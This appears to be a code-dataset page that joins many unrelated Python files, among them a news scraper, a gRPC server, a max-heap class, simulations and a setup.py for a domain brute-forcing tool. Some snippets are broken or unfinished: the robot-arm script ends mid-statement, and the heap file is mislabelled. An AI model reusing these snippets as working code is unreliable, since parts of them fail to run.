# list4 =  [1, 2, ['a', 'b']]
|
import requests
from bs4 import BeautifulSoup
import openpyxl

keyword = input("검색어 입력: ")
try:
    # Reuse the workbook from a previous run so new rows are appended below
    # the existing ones (e.g. when a different keyword was searched).
    wb = openpyxl.load_workbook("navernews.xlsx")
    sheet = wb.active
    print("불러오기 완료")
except Exception:  # narrowed from a bare except: so Ctrl-C still works
    # No (readable) workbook yet: start fresh with a header row.
    # Bug fix: the trailing text on this line was not commented out in the
    # original, which made the whole script a SyntaxError.
    wb = openpyxl.Workbook()  # create a new workbook
    sheet = wb.active
    sheet.append(['제목','언론사'])
    print("새로 파일을 만들었습니다.")
for page in range(1,52, 10):  # Naver paginates in tens: start = 1, 11, ..., 51
    url = "https://search.naver.com/search.naver?where=news&query="+keyword+"&start="+ str(page)
    row = requests.get(url, headers={'User-Agent':'Mozilla/5.0'})
    html = BeautifulSoup(row.text,'html.parser')
    # CSS selectors: container ul.type01>li, title a._sp_each_title,
    # press name span._sp_each_source
    articles = html.select('ul.type01>li')
    for news in articles:
        title = news.select_one('a._sp_each_title').text.strip()
        journal = news.select_one('span._sp_each_source').text.strip()
        print(title, journal)
        sheet.append([title, journal])
    print("="*50)
wb.save("navernews.xlsx")
|
import math
import csv  # NOTE(review): imported but unused in the visible code
# Servo calibration table: pulse widths (in ms) at each servo's two end stops
# ("min"/"max") and its centre position ("mid").  min > max means the servo
# runs in the reverse direction.
geometry = {
    "servo0min": 0.5,
    "servo0max": 2.5,
    "servo0mid": 1.85,
    "servo1min": 2.3,
    "servo1max": 0.55,
    "servo1mid": 1.4,
    "servo2min": 0.55,
    "servo2max": 2.5,
    "servo2mid": 1.55,
    "servo3min": 2.25,
    "servo3max": 0.7,
    "servo3mid": 2.25,
    "servo4min": 0.5,
    "servo4max": 2.5,
    "servo4mid": 1.5
}
# Arm geometry: lengths of the three arm segments (keys 0-2), the claw, and
# the base height.  NOTE(review): units are not stated in the source.
arms = {
    0: 0.84,
    1: 10.26,
    2: 9.85,
    "claw": 12,
    "height": 9
}
def summe(i):
    """Return the sum of the elements of *i*.

    The hand-rolled accumulation loop was replaced by the C-implemented
    built-in ``sum`` -- identical result (0 for an empty iterable), less code.
    """
    return sum(i)
def get_pos(anglesdeg):
    """Forward kinematics: joint angles in degrees -> [x, z] of the claw tip.

    NOTE(review): iterating ``for i in angles`` and then indexing
    ``angles[i]`` only works when *anglesdeg* is a dict keyed by servo number;
    the caller at the bottom of this file passes a plain list, which would
    index by the angle *value* instead -- confirm the intended input type.
    """
    factor = math.pi / 180
    angles = anglesdeg.copy()
    for i in angles:
        # print(angles[i])
        angles[i] = angles[i] * factor  # degrees -> radians
        # print(angles[i])
    x = 0
    z = 0
    # accumulate each arm segment, rotated by the sum of joint angles so far
    for angle in range(0, 3):
        x += (math.sin(summe([angles[i] for i in range(1, angle + 1)])) * arms[angle])
        z += (math.cos(summe([angles[i] for i in range(1, angle + 1)])) * arms[angle])
    x += arms[0]
    z += arms["height"]
    # the claw segment carries a fixed 15-degree offset
    angle = 3
    x += (math.sin(summe([angles[i] for i in range(1, angle + 1)]) - 15 * factor) * arms["claw"])
    z += (math.cos(summe([angles[i] for i in range(1, angle + 1)]) - 15 * factor) * arms["claw"])
    coordinateback = [x, z]
    # print(str(x))
    # print(str(y))
    # print(str(z))
    return coordinateback
def get_angles(ms):
    """Convert per-servo pulse widths (ms) back to angles in degrees.

    Servos whose pulse width is falsy (0/None) keep an angle of 0.
    """
    angles = {servo: 0 for servo in range(5)}
    for servo in angles:
        pulse = ms[servo]
        if not pulse:
            continue
        key = "servo" + str(servo)
        mid = geometry[key + "mid"]
        # one degree per 1/90 ms; negated for reversed servos (min > max)
        slope = 1 / 90
        if geometry[key + "min"] > geometry[key + "max"]:
            slope = -slope
        angles[servo] = (pulse - mid) / slope
    return angles
def get_ms(servo, angle):
    """Map an angle (degrees) to a pulse width (ms) for the given servo.

    Returns 0 when the resulting pulse falls outside the servo's calibrated
    [min, max] range (direction-aware for reversed servos).
    """
    key = "servo" + str(servo)
    lo = geometry[key + "min"]
    hi = geometry[key + "max"]
    mid = geometry[key + "mid"]
    # one degree corresponds to 1/90 ms; reversed servos run the other way
    slope = 1 / 90
    if lo > hi:
        slope = -slope
    pulse = angle * slope + mid
    if slope > 0:
        out_of_range = pulse < lo or pulse > hi
    else:
        out_of_range = pulse > lo or pulse < hi
    if out_of_range:
        return 0
    # ms = round(ms, 2)
    return pulse
def get_max_min(servo):
    """Return [min_angle, max_angle] in degrees for the given servo,
    derived from its calibrated pulse-width end stops."""
    key = "servo" + str(servo)
    lo = geometry[key + "min"]
    hi = geometry[key + "max"]
    mid = geometry[key + "mid"]
    # one degree per 1/90 ms, sign flipped for reversed servos
    slope = -1 / 90 if lo > hi else 1 / 90
    return [(lo - mid) / slope, (hi - mid) / slope]
def get_efficency(anglesdeg):
    """Weighted sum of servo angles: the last entry gets weight 1 and the
    weight grows by one for each position towards the front."""
    total = 0
    for weight, servo_angle in enumerate(reversed(anglesdeg), start=1):
        total += weight * servo_angle
    return total
pos = []
# NOTE(review): `pos` is empty, so `pos[servoR] = ...` raises IndexError;
# presumably `pos.append(get_max_min(servoR))` was intended.
for servoR in range(5):
    pos[servoR] = get_max_min(servoR)
"""
pos = [x, y, z, eff]
if eff < replace
"""
db = {}
# NOTE(review): range() only accepts integer arguments -- range(1, 0, -0.2)
# raises TypeError, and the float servo bounds below have the same problem.
for steps in range(1, 0, -0.2):
    for servo1 in range(pos[1][0], pos[1][1], steps):
        for servo2 in range(pos[2][0], pos[2][1], steps):
            for servo3 in range(pos[3][0], pos[3][1], steps):
                for servo4 in range(pos[4][0], pos[4][1], steps):
                    coordinate = []
                    coordinate.append(get_pos([servo1, servo2, servo3, servo4]))
                    # coordinate.append(get_efficency([servo0, servo1, servo2, servo3, servo4]))
                    # NOTE(review): a list is unhashable and cannot be a dict
                    # key, and the line below is an unfinished statement
                    # (`db[coordinate][]` is a SyntaxError) -- this script is
                    # incomplete as written.
                    if coordinate in db:
                        if db[coordinate][]
|
# Monte Carlo estimate of the Monty Hall win rate for a fixed strategy.
import random
num_simulations = 100000
num_times_right = 0
# switch choices or nay?
switch_bool = False
for i in range(num_simulations):
    doors = ['car', 'goat', 'goat']
    random.shuffle(doors)
    first_choice = random.choice(doors)
    first_choice_index = doors.index(first_choice)
    # the two remaining items can be car, goat or goat, goat
    doors.pop(first_choice_index)
    # switch gate
    if switch_bool:
        # remaining goat/s index, only get one (the host reveals one goat)
        remaining_goat_index = doors.index('goat')
        doors.pop(remaining_goat_index)
        # after the reveal, the single remaining door decides the game
        if doors[0] == 'car':
            num_times_right+=1
    else:
        # staying wins exactly when the first pick was the car
        if first_choice == 'car':
            num_times_right+=1
# percentage of simulated games won under the chosen strategy
pct_correct = (num_times_right/num_simulations)*100
print(pct_correct)
|
# 1. Read a line of text and count the words in it; words are separated by
#    spaces. E.g. input: "This is a python program." ->
#    output: "There are 5 words in the line."
string = input("pls input a string:")
# Fix: split() with no argument collapses runs of whitespace and ignores
# leading/trailing spaces, so repeated spaces no longer count as empty "words"
# (split(' ') produced '' entries). Also use len() instead of .__len__().
str_list = string.split()
print("There are {} words in the line.".format(len(str_list)))
|
#-*- coding:utf8 -*-
# Copyright (c) 2020 barriery
# Python release: 3.7.0
# Create time: 2020-07-19
import sys
import grpc
from . import schedule
from concurrent import futures
import contextlib
import socket
from contextlib import closing
from .entity import Contract, Node, Cluster
from .proto import schedule_service_pb2_grpc
from .proto import schedule_service_pb2 as schedule_pb2
class ScheduleServicer(schedule_service_pb2_grpc.ScheduleServiceServicer):
    """gRPC servicer that translates protobuf requests into calls on the
    local `schedule` module and packs the results back into responses."""
    def __init__(self):
        pass
    def _parse_clusters_pb(self, pb_clusters):
        """Convert repeated protobuf clusters into entity Cluster objects."""
        clusters = []
        for pb_cluster in pb_clusters:
            nodes = {}
            for pb_node in pb_cluster.nodes:
                # nodes are keyed by their `home` field
                nodes[pb_node.home] = Node(pb_node.home, pb_node.storage, pb_node.traffic)
            clusters.append(Cluster(pb_cluster.name, nodes))
        return clusters
    def _parse_contract_pb(self, pb_contract):
        """Convert a protobuf contract into an entity Contract (id unset)."""
        contract = Contract(None, pb_contract.storage, pb_contract.traffic)
        return contract
    def QueryDeployedCluster(self, requests, content):
        """Pick a cluster for the contract; error_code -1 when none fits."""
        clusters = self._parse_clusters_pb(requests.clusters)
        contract = self._parse_contract_pb(requests.contract)
        threshold = requests.threshold
        cluster_name = schedule.query_deployed_cluster(clusters, threshold, contract)
        resp = schedule_pb2.QueryDeployedClusterResponse()
        resp.error_code = 0
        if cluster_name is None:
            resp.error_code = -1
            return resp
        resp.cluster_name = cluster_name
        return resp
    def LoadBalancingByNodes(self, requests, content):
        """Compute contract transfers that rebalance the clusters;
        error_code -1 when no rebalancing plan is found."""
        clusters = self._parse_clusters_pb(requests.clusters)
        threshold = requests.threshold
        transfers = schedule.load_balancing_by_nodes(clusters, threshold)
        resp = schedule_pb2.LoadBalancingByNodesResponse()
        resp.error_code = 0
        if transfers is None:
            resp.error_code = -1
            return resp
        for transfer in transfers:
            # each transfer moves one contract from cluster `src` to `dst`
            resp.transfers.append(
                schedule_pb2.ContractTransfer(
                    contract_id=transfer["cid"],
                    cluster_src=transfer["src"],
                    cluster_dst=transfer["dst"]))
        return resp
class ScheduleServer(object):
    """Thin wrapper wiring ScheduleServicer into a threaded gRPC server."""
    def __init__(self):
        pass
    def _port_is_available(self, port):
        """Return True when nothing accepts TCP connections on *port*."""
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
            sock.settimeout(2)
            # connect_ex returns 0 on success, i.e. something is listening
            result = sock.connect_ex(('0.0.0.0', port))
        return result != 0
    def start(self, worker_num, port):
        """Start serving on *port* with *worker_num* threads; blocks forever."""
        #if not self._port_is_available(port):
        #    raise SystemExit("Port already use: {}".format(port))
        server = grpc.server(
            futures.ThreadPoolExecutor(max_workers=worker_num))
        schedule_service_pb2_grpc.add_ScheduleServiceServicer_to_server(
            ScheduleServicer(), server)
        # insecure (plaintext) endpoint on all interfaces
        server.add_insecure_port('[::]:{}'.format(port))
        server.start()
        print("Server start on {}".format(port))
        # block the calling thread until the server is terminated
        server.wait_for_termination()
if __name__ == "__main__":
    # Standalone entry point: two worker threads, listening on port 18080.
    server = ScheduleServer()
    server.start(2, 18080)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-01 09:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: creates the `album` model/table, including
    many-to-many links to `artist` and `category`."""

    dependencies = [
        ('application', '0002_auto_20170329_1928'),
    ]
    operations = [
        migrations.CreateModel(
            name='album',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=500)),
                ('release_date', models.DateTimeField()),
                ('publish_date', models.DateTimeField()),
                ('cover_url', models.TextField()),
                ('feature', models.BooleanField()),
                ('activeyn', models.BooleanField()),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('artist', models.ManyToManyField(to='application.artist')),
                ('category', models.ManyToManyField(to='application.category')),
            ],
        ),
    ]
|
from mesa import Agent, Model
from mesa.time import RandomActivation
from random import random, randint,choice
class Firm(Agent):
    """A firm: aggregates its employees' effort into output (utility)."""
    def __init__(self,unique_id, alpha,model):
        super().__init__(unique_id, model)
        self.agents = []  # employees currently on the payroll
        self.utility=0
        # NOTE(review): the `alpha` argument is ignored -- alpha is redrawn at
        # random while beta is computed from the argument, so alpha + beta is
        # generally != 1. Confirm whether `self.alpha = random()` is intended.
        self.alpha = random()
        self.beta = 1-alpha
        self.dead=False
    def step(self):
        # total effort supplied by all employees this step
        effort = sum([a.effort for a in self.agents])
        # firm output: linear term plus increasing-returns (quadratic) term
        self.utility = self.alpha * effort + self.beta * effort**2
        if len(self.agents) == 0:
            # a firm with no employees shuts down
            self.dead = True
        else:
            # output is shared equally among the employees
            self.income = self.utility/float(len(self.agents))
class FirmAgent(Agent):
    """An agent with fixed initial wealth.

    Each step the agent works for its firm, derives utility from firm output
    and leisure, then randomly stays, moves to another firm, or founds a
    start-up.
    """
    def __init__(self, unique_id, exp, model):
        super().__init__(unique_id, model)
        self.utility = 0
        self.effort = 1
        self.exp = exp       # preference/effort parameter in [0, 1]
        self.job = None      # the Firm this agent currently works for

    def step(self):
        # Employ myself in a fresh one-person firm if I have no job yet.
        if not self.job:
            self.job = Firm(0 - self.unique_id, 1, self.model)
            self.job.agents.append(self)
            self.model.schedule.add(self.job)
        self.effort = self.exp
        # Cobb-Douglas style utility over firm output and leisure (1 - effort).
        self.utility = (self.job.utility ** self.exp) * ((1 - self.effort) ** (1 - self.exp))
        ### am I happy?
        doo = choice(['stay', 'leave', 'startup'])
        if doo == 'leave':
            ### join a random firm
            # Bug fix: use self.model instead of the module-level global
            # `model`, so the agent works inside any model instance.
            firms = [f for f in self.model.schedule.agents
                     if isinstance(f, Firm) and not f.dead]
            self.job.agents.remove(self)   # quit my job
            self.job = choice(firms)       # find a new job
            self.job.agents.append(self)   # add myself to the payroll
        elif doo == 'startup':
            # found a new firm and employ myself in it
            self.job = Firm(1000 - self.unique_id, 1, self.model)
            self.job.agents.append(self)
            self.model.schedule.add(self.job)
class FirmModel(Model):
    """A model with some number of agents, activated in random order."""
    def __init__(self, N):
        self.alpha = 0.5
        self.beta = 1 - self.alpha
        self.num_agents = N
        # agents are stepped in random order each tick
        self.schedule = RandomActivation(self)
        # populate the schedule: each agent gets a random preference parameter
        for agent_id in range(self.num_agents):
            self.schedule.add(FirmAgent(agent_id, random(), self))

    def step(self):
        '''Advance the model by one step.'''
        self.schedule.step()
model = FirmModel(100)
# run the model for 1000 steps, reporting progress every 100 steps
for i in range(1000):
    if i % 100 ==0: print(i)
    model.step()
import pandas as pd
# collect per-agent utility and per-(surviving-)firm size/utility for analysis
agent_wealth = pd.DataFrame([{'id':a.unique_id, 'w':a.utility} for a in model.schedule.agents])
firms = [f for f in model.schedule.agents if isinstance(f,Firm) and not f.dead]
firm_wealth = pd.DataFrame([{'id':f.unique_id, 'size':len(f.agents),'w':f.utility} for f in firms])
|
lis = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
lis2 = [1, 2, 3, 4, "yep"]  # NOTE(review): unused in the visible code
# print(lis[0])
num = int(input())
# print every element up to the threshold, one per line
for element in lis:
    if element <= num:
        print(element)
# the same filter expressed as a list comprehension (printed as one list)
print([output for output in lis if output <= num])
import os
from generator.MentorInterviewDateGenerator import MentorInterviewDateGenerator
from applicant_interview_details import interview_details
from build import BuildTable
from generator.InterviewGenerator import InterviewGenerator
from dao.ApplicantQueries import ApplicantQueries
from dao.InterviewQueries import InterviewQueries
from generator.ExampleDataGenerator import ExampleDataGenerator
from generator.ApplicantsGenerator import ApplicantsGenerator
from ui.InterviewPrinter import InterviewPrinter
def clear_sreen():
    """Clear the terminal ('cls' on Windows, 'clear' elsewhere)."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
def main():
    """Console menu loop for the school system: routes the user to the
    administrator, mentor, or applicant submenu until they choose 0 (Exit).

    NOTE(review): int(input(...)) raises ValueError on non-numeric input, and
    the bare except blocks below hide the real cause of failures -- consider
    narrowing them and reporting the caught exception.
    """
    chosen_menu = 'q'  # sentinel so the loop body runs at least once
    clear_sreen()
    while chosen_menu != 0:
        print("\n- - - School system - Main Menu - - -\n-------------------------------------")
        print("1. I am an administrator")
        print("2. I am a mentor")
        print("3. I am an applicant")
        print("0. Exit")
        print("-------------------------------")
        chosen_menu = int(input("Please choose a menu number: "))
        if chosen_menu == 1:
            # --- administrator submenu ---
            clear_sreen()
            chosen_administrator_menu = 'q'
            while chosen_administrator_menu != 0:
                print("\n- - - School system - Administrator Menu - - -\n-------------------------------------")
                print("1. Create tables")
                print("2. Generate data")
                print("3. Generate applicants")
                print("4. Generate interview date to applicants")
                print("0. Exit")
                print("-------------------------------------")
                chosen_administrator_menu = int(input("Please choose an Administrator menu number: "))
                if chosen_administrator_menu == 1:
                    try:
                        BuildTable()
                        print("Tables created succcessfully")
                    except:
                        print("I can't create tables")
                elif chosen_administrator_menu == 2:
                    try:
                        ExampleDataGenerator.generate()
                        print("Data successfully generated and inserted")
                    except:
                        print("I can't Generate example data")
                elif chosen_administrator_menu == 3:
                    try:
                        ApplicantsGenerator()
                        print("Applicants data successfully generated and inserted")
                    except:
                        print("I can't Generate applicants")
                elif chosen_administrator_menu == 4:
                    try:
                        InterviewGenerator()
                        print("Interview dates successfully generated to applicants")
                    except:
                        print("Something went wrong. I can't generate interview dates to applicants")
                elif chosen_administrator_menu == 0:
                    clear_sreen()
                    break
                else:
                    print("Wrong menu number was given")
        elif chosen_menu == 2:
            # --- mentor submenu ---
            clear_sreen()
            chosen_mentor_menu = 'q'
            while chosen_mentor_menu != 0:
                print("\n- - - School system - Mentor Menu - - -\n-------------------------------------")
                print("1. Interviews")
                print("0. Exit")
                print("-------------------------------------")
                chosen_mentor_menu = int(input("Please choose a Mentor menu number: "))
                if chosen_mentor_menu == 1:
                    mentor_id = int(input("Please tell me your mentor id: "))
                    try:
                        MentorInterviewDateGenerator(mentor_id)
                    except:
                        print("There is no mentor with that id")
                elif chosen_mentor_menu == 0:
                    clear_sreen()
                    break
                else:
                    print("Wrong menu number was given")
        elif chosen_menu == 3:
            # --- applicant submenu ---
            clear_sreen()
            chosen_applicant_menu = 'q'
            while chosen_applicant_menu != 0:
                print("\n- - - School system - Applicant Menu - - -\n-------------------------------------")
                print("1. Interview details")
                print("2. Status details")
                print("3. School details")
                print("0. Exit")
                print("-------------------------------------")
                chosen_applicant_menu = int(input("Please choose an Applicant menu number: "))
                if chosen_applicant_menu == 1:
                    application_code = input("Please, enter your application code: ")
                    interviews = InterviewQueries.findInterviewsByApplicantCode(application_code)
                    InterviewPrinter.printList(interviews)
                elif chosen_applicant_menu == 2:
                    application_code = input("Please, enter your application code: ")
                    try:
                        status = ApplicantQueries.findStatusByCode(application_code)
                        print("Your application status is", status)
                    except:
                        print("There is no application code like that in the database. Please try again")
                elif chosen_applicant_menu == 3:
                    application_code = input("Please, enter your application code: ")
                    try:
                        school = ApplicantQueries.findSchoolByCode(application_code)
                        print("Your applied school is", school.city)
                    except:
                        print("There is no application code like that in the database. Please try again")
                elif chosen_applicant_menu == 0:
                    clear_sreen()
                    break
                else:
                    print("Wrong menu number was given")
        elif chosen_menu == 0:
            print("\n------------------------------------------------------------")
            print("| Thanks for choosing Codeorgo Software! See you next time!|")
            print("------------------------------------------------------------")
        else:
            print("Wrong menu number was given")
main()
|
# Python3 implementation of Min Heap
import sys
class MaxHeap:
    """Fixed-capacity binary max-heap backed by a 1-indexed Python list.

    Valid elements live at Heap[1..size]; Heap[0] holds a sys.maxsize
    sentinel so the sift-up loops in insert()/increaseKey() terminate at
    the root without a special case.
    """

    def __init__(self, maxsize):
        self.maxsize = maxsize
        self.size = 0
        self.Heap = [0] * (self.maxsize + 1)
        # Sentinel at index 0: >= any stored key, stops upward sifting.
        self.Heap[0] = 1 * sys.maxsize
        self.FRONT = 1

    def parent(self, pos):
        """Index of pos's parent (root's parent is the sentinel slot 0)."""
        return pos // 2

    def leftChild(self, pos):
        """Index of pos's left child."""
        return 2 * pos

    def rightChild(self, pos):
        """Index of pos's right child."""
        return (2 * pos) + 1

    def isLeaf(self, pos):
        """True when pos holds an element with no children.

        Bug fix: a node has a left child whenever 2*pos <= size, so only
        positions strictly beyond size//2 are leaves; the original also
        reported pos == size//2 as a leaf.
        """
        return self.size // 2 < pos <= self.size

    def insert(self, element):
        """Append element and sift it up; silently ignored when full."""
        if self.size >= self.maxsize:
            return
        self.size += 1
        self.Heap[self.size] = element
        current = self.size
        # Sift up until the parent is at least as large (sentinel stops us).
        while self.Heap[current] > self.Heap[self.parent(current)]:
            self.swap(current, self.parent(current))
            current = self.parent(current)

    def getMax(self):
        """Return (without removing) the maximum element."""
        return self.Heap[1]

    def extractMax(self):
        """Remove and return the maximum element.

        Bug fixes vs. the original: the last element lives at index
        self.size (not size-1), and the backing list must keep its fixed
        length — the original's list.pop() shifted the layout and
        corrupted every later operation.
        """
        if self.size == 0:
            raise IndexError("extractMax from an empty heap")
        popped = self.Heap[self.FRONT]
        self.Heap[self.FRONT] = self.Heap[self.size]
        self.Heap[self.size] = 0
        self.size -= 1
        self.maxHeapify(self.FRONT)
        return popped

    def increaseKey(self, index, data):
        """Raise the key at index to data (no-op if data is smaller)."""
        if self.Heap[index] > data:
            return
        self.Heap[index] = data
        while index != 0 and self.Heap[index] > self.Heap[self.parent(index)]:
            self.swap(index, self.parent(index))
            index = self.parent(index)

    def deleteKey(self, pos):
        """Delete the element at pos: float it to the root, then pop it."""
        self.increaseKey(pos, sys.maxsize)
        self.extractMax()

    def maxHeapify(self, pos):
        """Sift the element at pos down until its subtree is a max-heap."""
        l = self.leftChild(pos)
        r = self.rightChild(pos)
        largest = pos
        # Bug fix: the last valid index is self.size, so a child exists
        # when its index is <= size (the original used '<' and never
        # compared against the final element).
        if l <= self.size and self.Heap[l] > self.Heap[pos]:
            largest = l
        if r <= self.size and self.Heap[r] > self.Heap[largest]:
            largest = r
        if largest != pos:
            self.swap(pos, largest)
            self.maxHeapify(largest)

    def maxHeap(self):
        """Restore the heap property over the whole array, bottom-up."""
        for pos in range(self.size // 2, 0, -1):
            self.maxHeapify(pos)

    def swap(self, fpos, spos):
        """Exchange the elements at the two positions."""
        self.Heap[fpos], self.Heap[spos] = self.Heap[spos], self.Heap[fpos]

    def Print(self):
        """Dump the raw array and each parent with its two children."""
        print(self.Heap)
        for i in range(1, (self.size // 2) + 1):
            print(" PARENT : " + str(self.Heap[i]) + " LEFT CHILD : " + str(self.Heap[2 * i]) + " RIGHT CHILD : " + str(self.Heap[2 * i + 1]))
def main():
    """Demo driver: exercises the hand-rolled MaxHeap (the heapq variant
    is kept for reference but not invoked)."""

    def run_manual_heap():
        # Build a heap, then poke at increaseKey / extractMax / deleteKey.
        print('The maxHeap is ')
        heap_obj = MaxHeap(14)
        for value in [12, 10, 9, 8, 15, 1, 3, 4, 6, 5, 17, 20]:
            heap_obj.insert(value)
        heap_obj.Print()
        print(heap_obj.getMax())
        heap_obj.increaseKey(5, 10000)
        heap_obj.Print()
        print(heap_obj.getMax())
        print(heap_obj.extractMax())
        heap_obj.Print()
        heap_obj.deleteKey(6)
        print(" ")
        heap_obj.Print()

    def run_library_heap():
        # Same ideas via the stdlib heapq (a min-heap) API.
        from heapq import heapify, heappush, heappop
        heap = []
        heapify(heap)
        for value in (10, 30, 20, 400):
            heappush(heap, value)
        # Smallest element sits at index 0.
        print("Head value of heap : " + str(heap[0]))
        print("The heap elements : ")
        for item in heap:
            print(item, end=' ')
        print("\n")
        heappop(heap)
        print("The heap elements : ")
        for item in heap:
            print(item, end=' ')

    run_manual_heap()
    # run_library_heap()


# Driver Code
if __name__ == "__main__":
    main()
# -*- coding: utf-8 -*-
from os.path import expanduser
import configparser
import logging
class Config:
    """Parse ``~/<cfg>`` as an INI file into a flat ``configs`` mapping.

    Keys are ``"<section>_<option>"``.  Values are the raw strings, except
    the exact literals ``True``/``true`` and ``False``/``false``, which are
    converted to booleans.  An option that cannot be read is stored as
    ``None`` (best-effort, matching the original behavior).
    """

    # Class-level default kept for backward compatibility with any code
    # that reads Config.configs directly; each instance gets its own dict
    # in __init__ (the original shared this one mutable dict across every
    # instance — a classic mutable-class-attribute bug).
    configs = {}

    def __init__(self, cfg):
        home = expanduser("~")
        cfg = home + '/' + cfg
        #logging.info("Reading config from : " + cfg)
        config = configparser.ConfigParser()
        config.read(cfg, encoding='UTF-8')
        self.configs = {}
        for section in config.sections():
            for option in config.options(section):
                key = section + '_' + option
                try:
                    value = config.get(section, option)
                except configparser.Error:
                    # Narrowed from a bare except: only parser errors are
                    # expected here; anything else should surface.
                    self.configs[key] = None
                    continue
                if value == 'True' or value == 'true':
                    value = True
                elif value == 'False' or value == 'false':
                    value = False
                self.configs[key] = value
|
from __future__ import print_function
import copy
def wprint(a, size1, size2, f):
    """Write ``a`` transposed to stream ``f``: ``size1`` lines, each with
    ``size2`` space-separated values formatted to 10 decimal places
    (element order is a[col, row], so ``a`` needs tuple indexing)."""
    for row in range(size1):
        cells = ['%1.10f' % a[col, row] for col in range(size2)]
        f.write(' '.join(cells))
        f.write('\n')
def bprint(a, size, f):
    """Write the first ``size`` entries of ``a`` to stream ``f``, one per
    line, formatted to 10 decimal places."""
    for value in a[:size]:
        f.write('%1.10f\n' % value)
def smoothing(a, size1, size2, sh, center, rad1):
    """Return a weighted-neighbourhood smoothed copy of the 2-D grid ``a``.

    Each output cell mixes the cell itself (weight ``center``), its
    neighbours at Manhattan distance 1 (total weight ``4*rad1``) and those
    at Manhattan distance 2 (the remaining weight, split as ``rad2``),
    averaging within each ring.  Values <= -2000 are treated as missing
    and skipped.  ``sh`` is the half-width of the search window.
    """
    smoothed = copy.deepcopy(a)
    # Distance-2 weight chosen so center + 4*rad1 + 4*rad2 == 1.
    rad2 = (1. - center - 4. * rad1) / 4.
    for i in range(size1):
        for j in range(size2):
            smoothed[i][j] = 0.
            ring1_sum = 0.
            ring2_sum = 0.
            ring1_cnt = 0.
            ring2_cnt = 0.
            for ni in range(max(i - sh, 0), min(i + sh, size1 - 1) + 1):
                for nj in range(max(j - sh, 0), min(j + sh, size2 - 1) + 1):
                    if a[ni][nj] > -2000:
                        dist = abs(i - ni) + abs(j - nj)
                        if dist == 0:
                            smoothed[i][j] = a[ni][nj]
                        elif dist == 1:
                            ring1_sum += a[ni][nj]
                            ring1_cnt += 1.
                        elif dist == 2:
                            ring2_sum += a[ni][nj]
                            ring2_cnt += 1.
            # Avoid division by zero when a ring had no valid neighbours.
            if ring1_cnt == 0:
                ring1_cnt = 1
            if ring2_cnt == 0:
                ring2_cnt = 1
            smoothed[i][j] = smoothed[i][j] * center + ring1_sum * rad1 * 4. / ring1_cnt + ring2_sum * rad2 * 4 / ring2_cnt
    return smoothed
def wread(fa, size1, size2):
    """Read ``size1`` whitespace-separated rows from stream ``fa`` and
    convert the first ``size2`` tokens of each row to float (any extra
    tokens on a line are kept as strings, matching the original)."""
    rows = []
    for _ in range(size1):
        row = fa.readline().split()
        row[:size2] = [float(tok) for tok in row[:size2]]
        rows.append(row)
    return rows
def bread(f, size):
    """Read the whole stream, split on whitespace, and convert the first
    ``size`` tokens to float (extra tokens remain strings)."""
    tokens = f.read().split()
    tokens[:size] = [float(tok) for tok in tokens[:size]]
    return tokens
def accuracyprint(a, size1, size2, f):
    """Write ``a`` row-major to stream ``f`` as CSV, 10 decimal places
    per value, one line per row."""
    for i in range(size1):
        f.write(','.join('%1.10f' % a[i][j] for j in range(size2)))
        f.write('\n')
|
from setuptools import setup, find_packages

# Read the package version from the VERSION file.  The context manager
# closes the handle (the original leaked it), and strip() removes the
# trailing newline that would otherwise end up inside the version string.
with open("VERSION") as _version_file:
    VERSIONFILE = _version_file.read().strip()

setup(name='simplydomain',
      version=VERSIONFILE,
      description='simplydomain is a very basic framework to automate domain brute forcing.',
      url='http://github.com/SimplySecurity/simplydomain-pkg',
      author='Alexander Rymdeko-Harvey',
      author_email='a.rymdekoharvey@obscuritylabs.com',
      license='BSD 3.0',
      packages=[
          'simplydomain',
          'simplydomain.src',
          'simplydomain.src.dynamic_modules',
          'simplydomain.src.static_modules',
          'simplydomain.tests'
      ],
      classifiers=[
          # How mature is this project? Common values are
          #   3 - Alpha
          #   4 - Beta
          #   5 - Production/Stable
          'Development Status :: 4 - Beta',
          # Specify the Python versions you support here. In particular,
          # ensure that you indicate whether you support Python 2, 3 or both.
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7'
      ],
      install_requires=[
          'aiodns',
          'aiohttp',
          'beautifulsoup4',
          'crtsh',
          'dnsdumpster',
          'fake_useragent',
          'json2xml',
          'requests',
          'setuptools',
          'termcolor',
          'tqdm',
          'uvloop',
          'validators',
          'click'
      ],
      scripts=[
          'simplydomain/bin/simply_domain.py'
      ],
      include_package_data=True,
      zip_safe=False)
|
# User-facing message constants for the form / authentication flow.
# Form validation feedback:
FILLFORM= "Please fill out the form !"
# Login / logout session feedback:
SUCCESSFULLOGIN="Logged in successfully !"
SUCCESSFULLLOGOUT="Logged Out successfully"
# Registration validation errors:
ACCOUNTEXIST="Account already exists !"
INVALIDEMAIL="Invalid email address !"
INVALIDUSERNAME="Username must contain only characters and numbers !"
# Navigation notices shown after a successful action:
REDIRECTTOLOGINPAGE="Redirecting to login page"
REDIRECTTOEXPERIENCEPAGE="Redirecting to experience page"
SUCCESSFULLREGISTER="You have successfully registered !"
class WorkerBase():
    """Base class for map/reduce workers: records the controlling master
    and the id of the task this worker runs.  Subclasses override
    execute() and output()."""

    def __init__(self, master, task_id):
        # Bug fix: the original assigned the undefined name ``task_server``
        # (NameError on every construction); store the task_id parameter.
        self.task_id = task_id
        self.master = master

    def execute(self):
        """Run the task; stub to be overridden by subclasses."""
        pass

    def output(self):
        """Return the task's result; stub to be overridden by subclasses."""
        pass
class Mapper(WorkerBase):
    """Map-side worker; no mapper-specific behavior implemented yet."""
    pass
class Reducer(WorkerBase):
    """Reduce-side worker stub."""
    def on_receive_data(self):
        # Hook for incoming mapper output; not implemented yet.
        pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.